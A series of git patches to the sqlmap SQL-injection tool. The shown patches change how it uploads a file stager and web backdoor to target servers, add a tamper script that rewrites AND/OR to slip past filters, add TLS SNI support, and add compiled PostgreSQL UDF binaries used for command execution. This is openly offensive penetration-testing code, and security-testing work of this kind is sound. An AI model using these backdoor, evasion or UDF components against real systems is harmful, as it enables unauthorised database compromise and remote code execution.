@@ -130,7 +131,7 @@ class Web:
             return False
 
     def _webFileInject(self, fileContent, fileName, directory):
-        outFile = ntToPosixSlashes(os.path.join(directory, fileName))
+        outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
         uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
         query = ""
 
@@ -203,19 +204,16 @@ class Web:
         backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
         backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
 
-        stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
         stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
         success = False
 
         for directory in directories:
-            self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
-
-            if success:
-                break
-
             if not directory:
                 continue
 
+            stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
+            self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
+
             uploaded = False
             directory = ntToPosixSlashes(normalizePath(directory))
 
@@ -224,6 +222,9 @@ class Web:
             else:
                 directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
 
+            if not directory.endswith('/'):
+                directory += '/'
+
             # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
             infoMsg = "trying to upload the file stager on '%s' " % directory
             infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
@@ -254,6 +255,9 @@ class Web:
                     infoMsg += "via UNION method"
                     logger.info(infoMsg)
 
+                    stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
+                    self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
+
                     handle, filename = mkstemp()
                     os.fdopen(handle).close()  # close low level handle (causing problems later)
 
@@ -278,19 +282,8 @@ class Web:
                             uploaded = True
                             break
 
-            # Extra check - required
             if not uploaded:
-                self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port)
-                self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
-
-                debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
-                logger.debug(debugMsg)
-
-                uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
-                uplPage = uplPage or ""
-
-                if "sqlmap file uploader" not in uplPage:
-                    continue
+                continue
 
             if "<%" in uplPage or "<?" in uplPage:
                 warnMsg = "file stager uploaded on '%s', " % directory
@@ -343,10 +336,10 @@ class Web:
                     else:
                         continue
 
-                self.webBackdoorUrl = ntToPosixSlashes(os.path.join(self.webBaseUrl, backdoorName))
+                self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
                 self.webDirectory = directory
 
-            self.webBackdoorFilePath = ntToPosixSlashes(os.path.join(directory, backdoorName))
+            self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
 
             testStr = "command execution test"
             output = self.webBackdoorRunCmd("echo %s" % testStr)

From c62b0f7e68939854a4d7d8514f6fca2117ef0f8f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 28 May 2015 23:49:44 +0200
Subject: [PATCH 427/492] New tamper script

---
 tamper/symboliclogical.py | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 tamper/symboliclogical.py

diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py
new file mode 100644
index 000000000..a14198748
--- /dev/null
+++ b/tamper/symboliclogical.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOWEST
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
+
+    >>> tamper("1 AND '1'='1")
+    '1 && '1'='1'
+    """
+
+    retVal = payload
+
+    if payload:
+        retVal = re.sub(r"(?i)\bAND\b", "&&", re.sub(r"(?i)\bOR\b", "||", payload))
+
+    return retVal

From 08caca387b83b9168f3046cddd930b519503e23f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 29 May 2015 16:01:41 +0200
Subject: [PATCH 428/492] Minor patch of automatic WAF heuristic check

---
 lib/controller/checks.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 922a413a6..14d93936d 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1117,6 +1117,9 @@ def checkWaf():
     Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
     """
 
+    if any((conf.string, conf.notString, conf.regexp)):
+        return None
+
     dbmMsg = "heuristically checking if the target is protected by "
     dbmMsg += "some kind of WAF/IPS/IDS"
     logger.debug(dbmMsg)

From 341d2a6028bcd1da7bdf06695ec31dceb505b8bc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 29 May 2015 17:30:02 +0200
Subject: [PATCH 429/492] Minor fix for (hidden) switch '--dummy'

---
 lib/request/connect.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 4dc9bb0f7..470c3dcc9 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -212,7 +212,7 @@ class Connect(object):
             cpuThrottle(conf.cpuThrottle)
 
         if conf.dummy:
-            return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())
+            return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None
 
         threadData = getCurrentThreadData()
         with kb.locks.request:

From ec87d8ebda8a93b20a5de4ff0282d3d5b8252876 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 1 Jun 2015 10:45:16 +0200
Subject: [PATCH 430/492] Adding a support for SNI (Issue #1256)

---
 lib/core/option.py          |  1 +
 lib/request/httpshandler.py | 55 ++++++++++++++++++++++++++-----------
 2 files changed, 40 insertions(+), 16 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 34391841d..df20fdcc8 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1836,6 +1836,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.safeReq = AttribDict()
     kb.singleLogFlags = set()
     kb.reduceTests = None
+    kb.tlsSNI = None
     kb.stickyDBMS = False
     kb.stickyLevel = None
     kb.storeCrawlingChoice = None
diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py
index 7ea178160..bbd291e15 100644
--- a/lib/request/httpshandler.py
+++ b/lib/request/httpshandler.py
@@ -7,8 +7,10 @@ See the file 'doc/COPYING' for copying permission
 
 import httplib
 import socket
+import sys
 import urllib2
 
+from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapConnectionException
 
@@ -19,7 +21,7 @@ try:
 except ImportError:
     pass
 
-_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_SSLv3", "PROTOCOL_TLSv1", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))
+_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))
 
 class HTTPSConnection(httplib.HTTPSConnection):
     """
@@ -41,21 +43,42 @@ class HTTPSConnection(httplib.HTTPSConnection):
 
         success = False
 
-        for protocol in _protocols:
-            try:
-                sock = create_sock()
-                _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)
-                if _:
-                    success = True
-                    self.sock = _
-                    _protocols.remove(protocol)
-                    _protocols.insert(0, protocol)
-                    break
-                else:
-                    sock.close()
-            except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
-                self._tunnel_host = None
-                logger.debug("SSL connection error occurred ('%s')" % errMsg)
+        if not kb.tlsSNI:
+            for protocol in _protocols:
+                try:
+                    sock = create_sock()
+                    _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)
+                    if _:
+                        success = True
+                        self.sock = _
+                        _protocols.remove(protocol)
+                        _protocols.insert(0, protocol)
+                        break
+                    else:
+                        sock.close()
+                except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
+                    self._tunnel_host = None
+                    logger.debug("SSL connection error occurred ('%s')" % errMsg)
+
+        # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
+        #               https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
+        if not success and hasattr(ssl, "SSLContext"):
+            for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
+                try:
+                    sock = create_sock()
+                    context = ssl.SSLContext(protocol)
+                    _ = context.wrap_socket(sock, do_handshake_on_connect=False, server_hostname=self.host)
+                    if _:
+                        kb.tlsSNI = success = True
+                        self.sock = _
+                        _protocols.remove(protocol)
+                        _protocols.insert(0, protocol)
+                        break
+                    else:
+                        sock.close()
+                except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
+                    self._tunnel_host = None
+                    logger.debug("SSL connection error occurred ('%s')" % errMsg)
 
         if not success:
             raise SqlmapConnectionException("can't establish SSL connection")

From 515ba5fb314476fa216df66f17f9316ef2b570ea Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 1 Jun 2015 11:13:02 +0200
Subject: [PATCH 431/492] Minor patch for an Issue #1252

---
 tamper/greatest.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tamper/greatest.py b/tamper/greatest.py
index cf4688361..a1c3f8df3 100644
--- a/tamper/greatest.py
+++ b/tamper/greatest.py
@@ -36,7 +36,7 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
-        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)
+        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload)
 
         if match:
             _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4))

From 87b5262ef7e8e287f5b71894222ccf9c7722f3ee Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 1 Jun 2015 14:18:21 +0200
Subject: [PATCH 432/492] Minor patch

---
 tamper/symboliclogical.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py
index a14198748..cb8e91630 100644
--- a/tamper/symboliclogical.py
+++ b/tamper/symboliclogical.py
@@ -25,6 +25,6 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
-        retVal = re.sub(r"(?i)\bAND\b", "&&", re.sub(r"(?i)\bOR\b", "||", payload))
+        retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))
 
     return retVal

From 419c55898b6365fdde5f71b01d6402809bc4b9b6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 5 Jun 2015 15:23:39 +0200
Subject: [PATCH 433/492] Adding compiled UDFs for PostgreSQL 64-bit (9.1, 9.2,
 9.3 and 9.4)

---
 .../linux/64/9.1/lib_postgresqludf_sys.so_       | Bin 0 -> 3248 bytes
 .../linux/64/9.2/lib_postgresqludf_sys.so_       | Bin 0 -> 3249 bytes
 .../linux/64/9.3/lib_postgresqludf_sys.so_       | Bin 0 -> 3248 bytes
 .../linux/64/9.4/lib_postgresqludf_sys.so_       | Bin 0 -> 3248 bytes
 4 files changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
 create mode 100644 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
 create mode 100644 udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
 create mode 100644 udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_

diff --git a/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..eee10ec8c7b34f86a45bcc3c51f5ab8b987f0aef
GIT binary patch
literal 3248
zcmV;h3{Ue1oV_Lj4=gHazc$m7mhxqwKYA&GBuluG5>$m%%i5G{A(^r)p~cUdrWVqB
z(_34w&`k;(b_sTG8rWiJoen4nV<}<?$1cY@#?>7b)nXa9_`#s#x}dARfKyjgUn{cb
z+z3#;23vglk4Oyj1m_6PM)%y$2;T&7)<{uGWpjk5L-GuQ(#U%<t{S}gnlx3w)sTJo
zpFXB6-2;+Dl`zRWJ*@O#?R8(<XAqkm&A?najVO(o2{{=k%j^}ILC0>^YmONi5*-G3
z<Mk&oP0_@#=?tZOub-c!$pv$gGvo=kgCc&p`dh{(H4kHVCiaVIZTskP`v_Rq{MPu=
z7a$HI@Hgp)5@M)Gc=C;qG+!_t4QAxI%rI8N9fmrP5|DJ6Lzx%-h!$PsnLXRD7*{_2
zZscTN&xS*4O`B;OW#lH1`LvjE`Nt^P)@CNS@xt{-P1cVC5gz|1cb|H>(+ZH;(9pS(
zmpbPq;bqIGOd_lZ3=*E%l2-u}G)^|Y?bOP!?bui<_evo9jQ{mE3iV(E8t)Un_D0w1
zllB3&v(L5Sv)Rl43*BrgF#Y$Q!xZnFxmfwNOUFQ?6$irZ_m8~@E%H(W@5IeS{b;Xm
zMZ_&Tnu<)hFogCS=w-6=M~>E0{JLZM;bZ)*M)*8N;+dE{00VJBkb}qN7tO+OZW8?U
z7ATGfLq_}{$e{ovas3bs=(pz3ugbx@HueeC<lrc65>e~ZKsNRPn3tp8&v)|0<gZ$q
z%=eksXJ8)ub;kE((EryK3?>;XP)-8B&d(@}U>*E#<6s;CQ$;{Bc`^X*J2JkJ?Y|m~
z-xbO9U>N>zG@2v9_#2K#QY-)R3QL>$-^u(y!uS#906WU82vy}+kQpMUQ5*poFwE5d
zLh~FM{m{m8Bd*S_56EgP+%CoCU9LY@pl_FOfVgFvD7ZzuE)W=BrU#?VRF-?gUJ$dp
zLg>}XvX{6+LJ<q#ad}CAxC5OOTGJ$L3&$PaXBO%U3b{mlVVAE&<X(!mI1W0Ls5ExF
zLjeeDuQr!NXLAII$6)0;BaJ&n(YsLWiuJ}L-eIqJnQ^ae3CC+Fha~ClT`!^syEnvW
z^#uz0>)bwVb~wCVZS@rj#FQ7vZ0TCQF|Tc0ZZJ<{(`L1JJ=D%<j^2;HLgA2)3ktbh
z8@)uJJAGoA>b^g3Ma|uQ`X`T2=Jnn%1Bys@VN35pC1Z261njY}0)7q#UJ*zOA_P;W
za(XYJak8wjp%ICz${`xBrh^)!_kJA4kK`XuWUlaB^uNzfwi&ypcy-b82ov7(^KqXz
zF!Bbj<J)I2%1s7QB&HUK_X`2<q{V$uQFg1qFm4B%z%Xj~b%CE*@G^{G$NGe)M0z2-
zc(-=E2NCpiyay4Acl<|z?`{XPzz}QrJ%Qg{@H&0JJmAIs375c&7?W6f0fN9lT=0^>
zzhCfLeZM&1#r*?6;8=D1+kH?GHe7u`Cg5;%1F67ZZU+uyDuGaJ_$+-;Lw%48eLyJS
z<@hKW3cY?%_M3QiHYflq8(Qf`V8Z~(tR=WT*^jEJToyMB-a2L|JQak>06b==Efs*u
z5TcAMSM`0B_o9p}L-kvgAUkHKEfsi`pFC!#FBM#s|A0+~nTjv@4wMecq}r&wY#N+Z
zsaaJJI%cOgs+P)|FUD4os-W_Dlnz#<tSgS9j4WOnq4H&v4t1n=mD?`Hp)j4gi1OW6
zBp3Usylv%)wEZg~j`CaD0ae$bLz%Xp%D18;HQO-dRg|aD_JfT5P!P)?BNtloJba2y
zLOpmLcrXo3zjJfs<l<d`X$I~_M)A30Kv=CvwsC^ts3uJOrb+^P$8_|MX)XPab;tDg
zoy(JK5X$?G-C1Ng<ixN8@Eu6CpYlPq0BG$%I{S@_pM6Bq0)t~9{CSjti^S(OvAh!T
zS>V-n(0$c#0IkFMLO*9QaQaW#G#L^Z^A_=reNQYIJ`Wyg+~jG97<|y+R6^34x_o1#
zDZ*e9-?L99c_b;xiF7jCrtL%-Gp=SbK_8Gp7WJptKAv#o8_Zi+-jZy1FhD{RvXHy)
z7GeuaNW^fYWNbJjRWQ^MF46j%K+70#%E{hC_3ZZ_m-uK)W^14;F#~;tKb%6COIi+5
zf1gi1cF@U1Z19bSqqK^V(=gxD>bMAR;+lsJMkQm-(0bpmB~lOs(5hLf7|>)Z+u^ca
zv0z*EdAJiZ1L-$&sdza)9xkgYPCNqY0HEMe^yf3EjwuWJv2LB-;U_X;uMONW-BHlo
zs%_w82SAX)Dq3~8(4c9xV@i_MtvORfMvVW1l~~kjONgQ4bX0g>e@6Z>nn=`{Bby<b
z?5kOFp0gExwf>o{!3?NQ@j8R&TS=e|YokH-x|#OJm+DYX^oM!6AQ3a1D?~roxQJKz
z!_J?iiQ_R3itP`yMeYo^Elb`T{u|n77kLuI+Ai8&+Y{<XSB{@taE#l7;b8CV5!ndB
z_<2Fbsjq=8{Dd|!Inwo&@5r8P^_6^;;L97A&tU~>pWOE1+Lst`tNT&l@<(`LOsKrl
zkSod_ZDYeB>Vbmv1jnVl=)LlDPjtW(<$qwfjd^nv3OwSX*2%EOtV_ZGpvM~^26psY
zVILsH8Uy+k^!a2ZE1kx=Y!E(|syVGhp!N~t@!HBv1dSz``s{i|yVSLSmG3?MJXif?
zTS*d5L9m3r=uyR8^#euiXCXz?FGi5sJDmeJJeNY>qQ5B56#n*pS^MTLXw}q6)B*#x
z9IL4d%f9%Ll7W;KtJ5oOKqa!ZvA7$H43!=<@l{6s=2Bo=GLvCLQ}2CP!=^)`?z+IH
z|B$-)L!FrwO2w1vLnW7W1dNq%=iqU=coy40iINvYsi>^F1_AYgg-W+a>Xt|Amv#4a
z10e!;X?ecXz(h4tUhLeITF=NNga~mX4^RM?G2?MAalQIO;4*;we(!q37;T(rOu-jG
z-~+&kPlbYj*MAXt{Cn_!;AnvVdF+O*p=&whe!!cI9QQNBhLyz798SzvVHm~;I^|Ot
zWYl26pj*o=sS^gt`1R(E<hJRH5xlvaVO-GOc1C>ySe`J@{vpT`z|$CJha2fgMWnI^
zo-DEnH5y+;TTHojim(C!&=fqqMai<=S2P;^1~gg}+#3_5stRokj`h8B2A8hB`H*lw
z-hKRa=2#Z2lghT|Mq3oW$yV9o`EjYDD6)Zb4nGD$M>+sm7vF3}0N7dV*IV#B%->w-
z@8P^f$(l>mHn#2PufM=v)x^iuHnqk;HA*q5!d}@wp^hnkE~Ec(@GMK3>0sN9=jHR@
z|B*E92_L&+wB5hDyxq@({vxB7$GKqmdEn_xS@;InCs37IPR{LFcc)<EjA%!tro1+J
zWuQEFkQ-S6Q4o_&2L9%>k0S6)NdW%j7(4!B$<HtR+|S>I@%pAr<mdmHx(xxg-^1$r
z_8mntP}p9ZpQ+o}9+{t|T&$d*0-qfA{1eO11N^KZ!_El&GY}qV10wLVM?gH*X&Ulm
zbWG!6AIQ(-yg?@sOa4hIkQq(y*DNzp9p&FnM%x6vU`_G&&HA*CjRZi$IA-n{_;te`
zhKFYX!SHj#eMt_cO}w7reTFn<t{LbYxQ-q`!#HN{8TfU>9zjmo^W(BwG!eDhoZj|;
zL>rwDAQ!KiC_*T^U&LYa!#up=5m@#wC-K@uJl*#8?mw^`VMCfM$?uN&iM^vpYwPXO
zFNqae>%7q?Ut`K|BQI(7dEKbUu3bKb*y+1&M81e$3HpY_VRF-W2)ozs@;cojA(y{g
zMOhYUQ3y-w?$uNH^<^-WhT-mY2cYV(J^!>NOONfbXR!prA|l?9k_ub@zl7^I19{H%
z0)beQF~*xYz8}xmNI0in(=oqb;2!96tc^6!;0Bqf|3RVO-xI8I+@9}fV=#96i!QL|
z>$rj{#qIh2!;$YuL+LyEVM|iP&(}o986x~SV%BUDP`N7r9$6*HC;WL02K$?t5E0M!
zP>y`M`t|L<Fc{DGJdOkZJDu?+?EM?;n`c=8|KO;*?ITG5Lq+?x;xmlsMckspkj|a}
z|KqqOD53shw4$@;_e73`MFIl+WSIS>@tc&1jYR?i{hJH+xxUlossM-1z7q{uX=F_G
z_4DTrqK$4K2^`-{v+L{S-8%$8#O?Y0zv5NxARF-@x&Tc3nya+`bkW9++m8Y$)f@go
zD*R!GiI2m8t^xi*(!z0fwqx}SW75aZ>=c;&+bFRAyUw29*Z6(AE&JaXW4GtuYRpFL
i_4DUEDFB6z=k`nryk2w}MAMW^`!EdH^YlPcFhS|B3Vz-I

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..0fcb1913d0cc033ec6722557c3bba307eb27357e
GIT binary patch
literal 3249
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
